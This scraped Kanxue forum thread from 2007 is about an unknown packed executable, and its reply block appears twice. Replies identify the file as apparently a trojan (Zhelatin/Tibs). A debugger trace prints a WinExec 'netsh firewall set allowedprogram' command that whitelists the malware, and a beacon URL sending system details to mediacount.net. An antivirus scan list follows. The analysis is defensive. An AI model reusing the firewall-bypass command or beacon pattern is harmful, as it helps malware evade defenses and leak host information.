[求助]一个未知壳，peid不认识，但脱后无法运行，帮忙看看-加壳脱壳-看雪-安全社区|安全招聘|kanxue.com

最新回复 (6)
promsied 雪币： 589 活跃值： (119) 能力值： ( LV11，RANK：190 ) 在线值：发帖 11 回帖 94 粉丝 3 关注私信	promsied 4 2 楼没人吗自顶一下 2007-10-6 12:32 0
adddddd 雪币： 200 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 6 粉丝 1 关注私信	adddddd 3 楼我下载来试试看 2007-10-6 12:43 0
laohai 雪币： 211 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 284 粉丝 0 关注私信	laohai 4 楼查到的是这个：MPEG Layer II/III music file * 2007-10-7 22:26 0
icefall 雪币： 154 活跃值： (75) 能力值： ( LV4，RANK：50 ) 在线值：发帖 18 回帖 156 粉丝 0 关注私信	icefall 1 5 楼好像是个病毒任务管理器打不开卡巴运行不了防火墙放行 00402337 E8 1C300000 CALL win32.00405358 ; JMP 到 kernel32.WinExec 0013EB80 0013F528 \|CmdLine = "netsh firewall set allowedprogram 'C:\Documents and Settings\Administrator\桌面\win32.exe' enable" 收集信息 0013EB34 00407140 ASCII "http://mediacount.net/adv/064/adload.php?a1=People's Republic of China&a2=Type of Processor: PENTIUM PRO or PENTIUM II/III&a3=Windows version is 5.1&a4=Build: 2600, Platform ID: 2&a5=outpost.exe&table=adv64" 0013EB38 004084AA ASCII "%s%s%s0%u%s?a1=%s&a2=%s&a3=%s&a4=%s&a5=%s&table=adv%u" 0013EB3C 0013FE50 ASCII "http://" 0013EB40 0013FD50 ASCII "mediacount.net" 还有复制文件到系统目录、自启动等等不知道楼主居心何在？ 2007-10-7 22:59 0
ynboyinkm 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 82 回帖 443 粉丝 0 关注私信	ynboyinkm 6 楼呵呵,在这放马呀??? 2007-10-8 10:29 0
心海伽蓝雪币： 203 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 17 回帖 187 粉丝 0 关注私信	心海伽蓝 7 楼 Scan taken on 08 Oct 2007 02:53:10 (GMT) A-Squared Found nothing AntiVir Found WORM/Zhelatin.Gen ArcaVir Found Trojan.W32.Lager.Dr81 Avast Found Win32:Tibser AVG Antivirus Found Downloader.Tibs BitDefender Found Trojan.Peed.ILS ClamAV Found nothing CPsecure Found nothing Dr.Web Found nothing F-Prot Antivirus Found nothing F-Secure Anti-Virus Found nothing Fortinet Found nothing Kaspersky Anti-Virus Found Email-Worm.Win32.Zhelatin.kf NOD32 Found nothing Norman Virus Control Found Tibs.gen168 Panda Antivirus Found nothing Rising Antivirus Found nothing Sophos Antivirus Found nothing VirusBuster Found nothing VBA32 Found nothing 2007-10-8 10:54 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (6)
promsied 雪币： 589 活跃值： (119) 能力值： ( LV11，RANK：190 ) 在线值：发帖 11 回帖 94 粉丝 3 关注私信	promsied 4 2 楼没人吗自顶一下 2007-10-6 12:32 0
adddddd 雪币： 200 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 6 粉丝 1 关注私信	adddddd 3 楼我下载来试试看 2007-10-6 12:43 0
laohai 雪币： 211 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 284 粉丝 0 关注私信	laohai 4 楼查到的是这个：MPEG Layer II/III music file * 2007-10-7 22:26 0
icefall 雪币： 154 活跃值： (75) 能力值： ( LV4，RANK：50 ) 在线值：发帖 18 回帖 156 粉丝 0 关注私信	icefall 1 5 楼好像是个病毒任务管理器打不开卡巴运行不了防火墙放行 00402337 E8 1C300000 CALL win32.00405358 ; JMP 到 kernel32.WinExec 0013EB80 0013F528 \|CmdLine = "netsh firewall set allowedprogram 'C:\Documents and Settings\Administrator\桌面\win32.exe' enable" 收集信息 0013EB34 00407140 ASCII "http://mediacount.net/adv/064/adload.php?a1=People's Republic of China&a2=Type of Processor: PENTIUM PRO or PENTIUM II/III&a3=Windows version is 5.1&a4=Build: 2600, Platform ID: 2&a5=outpost.exe&table=adv64" 0013EB38 004084AA ASCII "%s%s%s0%u%s?a1=%s&a2=%s&a3=%s&a4=%s&a5=%s&table=adv%u" 0013EB3C 0013FE50 ASCII "http://" 0013EB40 0013FD50 ASCII "mediacount.net" 还有复制文件到系统目录、自启动等等不知道楼主居心何在？ 2007-10-7 22:59 0
ynboyinkm 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 82 回帖 443 粉丝 0 关注私信	ynboyinkm 6 楼呵呵,在这放马呀??? 2007-10-8 10:29 0
心海伽蓝雪币： 203 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 17 回帖 187 粉丝 0 关注私信	心海伽蓝 7 楼 Scan taken on 08 Oct 2007 02:53:10 (GMT) A-Squared Found nothing AntiVir Found WORM/Zhelatin.Gen ArcaVir Found Trojan.W32.Lager.Dr81 Avast Found Win32:Tibser AVG Antivirus Found Downloader.Tibs BitDefender Found Trojan.Peed.ILS ClamAV Found nothing CPsecure Found nothing Dr.Web Found nothing F-Prot Antivirus Found nothing F-Secure Anti-Virus Found nothing Fortinet Found nothing Kaspersky Anti-Virus Found Email-Worm.Win32.Zhelatin.kf NOD32 Found nothing Norman Virus Control Found Tibs.gen168 Panda Antivirus Found nothing Rising Antivirus Found nothing Sophos Antivirus Found nothing VirusBuster Found nothing VBA32 Found nothing 2007-10-8 10:54 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复